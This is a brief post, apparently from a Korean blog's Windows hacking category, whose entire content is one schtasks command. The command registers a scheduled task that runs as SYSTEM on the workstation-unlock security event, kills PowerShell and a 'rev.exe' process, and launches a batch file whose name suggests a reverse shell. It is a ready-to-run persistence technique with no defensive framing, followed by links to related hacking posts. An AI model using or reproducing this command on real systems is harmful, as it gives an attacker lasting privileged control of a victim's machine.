schtasks /RU "NT Authority\SYSTEM" /Create /SC ONEVENT /MO "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4801]]" /EC Security /TN "cirruslogon" /TR "cmd /c (taskkill /F /IM powershell.exe rev.exe) & c:\cirrus_rev.bat" /F /RL highest
'Hacking > Windows' 카테고리의 다른 글
DDE, DDEAUTO Attack with powershell (0) | 2017.10.31 |
---|---|
[WMI] 실행중인 프로그램의 실행옵션 보기 (0) | 2015.09.17 |
Active Directory login하기 (0) | 2015.09.10 |